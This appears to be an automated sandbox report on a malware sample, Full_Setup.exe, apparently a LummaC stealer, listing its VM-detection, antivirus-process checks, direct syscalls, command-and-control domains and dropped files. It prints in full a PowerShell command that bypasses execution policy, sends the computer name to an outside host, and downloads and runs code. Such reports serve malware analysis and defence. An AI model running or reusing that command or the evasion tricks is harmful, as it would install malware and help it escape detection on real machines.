Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Full_Setup.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\Full_Setup.exe

System information queried: FirmwareTableInformation

Jump to behavior

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe

API/Special instruction interceptor: Address: 6BB27C44

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	RDTSC instruction interceptor: First address: 6BB2F3E1 second address: 6BB2F3FD instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-20h], eax 0x00000005 mov dword ptr [ebp-1Ch], edx 0x00000008 lea esi, dword ptr [ebp-38h] 0x0000000b xor eax, eax 0x0000000d xor ecx, ecx 0x0000000f cpuid 0x00000011 mov dword ptr [esi], eax 0x00000013 mov dword ptr [esi+04h], ebx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	RDTSC instruction interceptor: First address: 6BB2F3FD second address: 6BB2F3E1 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-18h], eax 0x00000005 mov dword ptr [ebp-14h], edx 0x00000008 mov eax, dword ptr [ebp-18h] 0x0000000b sub eax, dword ptr [ebp-20h] 0x0000000e mov ecx, dword ptr [ebp-14h] 0x00000011 sbb ecx, dword ptr [ebp-1Ch] 0x00000014 add eax, dword ptr [ebp-10h] 0x00000017 adc ecx, dword ptr [ebp-0Ch] 0x0000001a mov dword ptr [ebp-10h], eax 0x0000001d mov dword ptr [ebp-0Ch], ecx 0x00000020 jmp 00007FDD6872B785h 0x00000022 mov edx, dword ptr [ebp-04h] 0x00000025 add edx, 01h 0x00000028 mov dword ptr [ebp-04h], edx 0x0000002b cmp dword ptr [ebp-04h], 64h 0x0000002f jnl 00007FDD6872B810h 0x00000031 rdtsc

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5706			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4032			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-427IU.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-427IU.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2DAON.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2DAON.tmp\_isetup\_setup64.tmp	Jump to dropped file

Source: C:\Users\user\Desktop\Full_Setup.exe TID: 6472	Thread sleep time: -210000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5064	Thread sleep count: 5706 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2756	Thread sleep count: 4032 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4476	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Full_Setup.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809			Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809			Jump to behavior

Source: C:\Users\user\Desktop\Full_Setup.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: powershell.exe, 00000004.00000002.1962949630.00000000050B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: 8R65FTCZQK06W5IFC.tmp, 00000007.00000002.2049676670.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}E
Source: powershell.exe, 00000004.00000002.1962949630.00000000050B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: Full_Setup.exe, 00000000.00000003.1887667498.0000000000895000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW3
Source: Full_Setup.exe, Full_Setup.exe, 00000000.00000003.1887667498.0000000000895000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2015508311.000000000086B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000004.00000002.1975426356.00000000076D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllPath
Source: powershell.exe, 00000004.00000002.1962949630.00000000050B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter

Source: C:\Users\user\Desktop\Full_Setup.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe

NtQuerySystemInformation: Direct from: 0x4585B0

LummaC encrypted strings found

Source: Full_Setup.exe, 00000000.00000002.2020014430.00000000029A0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: cloudewahsj.shop
Source: Full_Setup.exe, 00000000.00000002.2020014430.00000000029A0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: rabidcowse.shop
Source: Full_Setup.exe, 00000000.00000002.2020014430.00000000029A0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: noisycuttej.shop
Source: Full_Setup.exe, 00000000.00000002.2020014430.00000000029A0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: tirepublicerj.shop
Source: Full_Setup.exe, 00000000.00000002.2020014430.00000000029A0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: framekgirus.shop
Source: Full_Setup.exe, 00000000.00000002.2020014430.00000000029A0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: wholersorie.shop
Source: Full_Setup.exe, 00000000.00000002.2020014430.00000000029A0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: abruptyopsn.shop
Source: Full_Setup.exe, 00000000.00000002.2020014430.00000000029A0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: nearycrepso.shop
Source: Full_Setup.exe, 00000000.00000002.2020014430.00000000029A0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: aloofysofar.click

Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Process created: C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe "C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Process created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"

Source: C:\Users\user\Desktop\Full_Setup.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; z
Source: C:\Users\user\Desktop\Full_Setup.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; z			Jump to behavior

Source: BrightLib.exe, 00000024.00000002.2526451189.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000024.00000000.2482040175.000000000049A000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowahk_idpidclassgroup%s%uProgram Manager\P{Xps}\H\P{Xan}\P{Lu}\P{Ll}\P{L}\p{Xps}\h\p{Xan}\p{Lu}\p{Ll}\p{L}\p{Xwd}\P{Xwd}\p{Xsp}\P{Xsp}\p{Nd}\P{Nd}Error text not found (please report)Q\E{0,DEFINEUTF8)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressioninternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: BrightLib.exe, 00000024.00000002.2526451189.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000024.00000000.2482040175.000000000049A000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: regk-hookm-hook2-hooksjoypollPART(no)%s%s%s%s%s{Raw}%s%cHotstring max abbreviation length is 40.LEFTLRIGHTRMIDDLEMX1X2WUWDWLWRSendInputuser32{Blind}{ClickLl{}^+!#{}RawTempSsASC U+ ,LWin RWin LShift RShift LCtrl RCtrl LAlt RAlt sc%03Xvk%02XALTDOWNALTUPSHIFTDOWNSHIFTUPCTRLDOWNCONTROLDOWNCTRLUPCONTROLUPLWINDOWNLWINUPRWINDOWNRWINUP...%s[%Iu of %Iu]: %-1.60s%sHKLMHKEY_LOCAL_MACHINEHKCRHKEY_CLASSES_ROOTHKCCHKEY_CURRENT_CONFIGHKCUHKEY_CURRENT_USERHKUHKEY_USERSREG_SZREG_EXPAND_SZREG_MULTI_SZREG_DWORDREG_BINARYMasterSpeakersHeadphonesDigitalLineMicrophoneSynthCDTelephonePCSpeakerWaveAuxAnalogVolVolumeOnOffMuteMonoLoudnessStereoEnhBassBoostPanQSoundPanBassTrebleEqualizerRegExFASTSLOWAscChrDerefHTMLModPowExpSqrtLogLnRoundCeilFloorAbsSinCosTanASinACosATanBitAndBitOrBitXOrBitNotBitShiftLeftBitShiftRightAddDefaultIconNoIconDestroyNamePriorityInterruptNoTimersTypeONLocalePermitMouseSendAndMouseMouseMoveOffPlayEventThenEventThenPlayYESNOOKCANCELABORTIGNORERETRYCONTINUETRYAGAINTimeoutMINMAXHIDEScreenRelativeWindowClientPixelCaretIntegerFloatNumberTimeDateDigitXdigitAlnumAlphaUpperLowerUTF-8UTF-8-RAWUTF-16UTF-16-RAWCPRemoveClipboardFormatListenerAddClipboardFormatListenerTrayNo tray memstatus AHK_PlayMe modeclose AHK_PlayMe.aut%s\%sRegClassAutoHotkey2Shell_TrayWndCreateWindoweditLucida ConsoleConsolasCritical Error: %s

Source: C:\Users\user\Desktop\Full_Setup.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
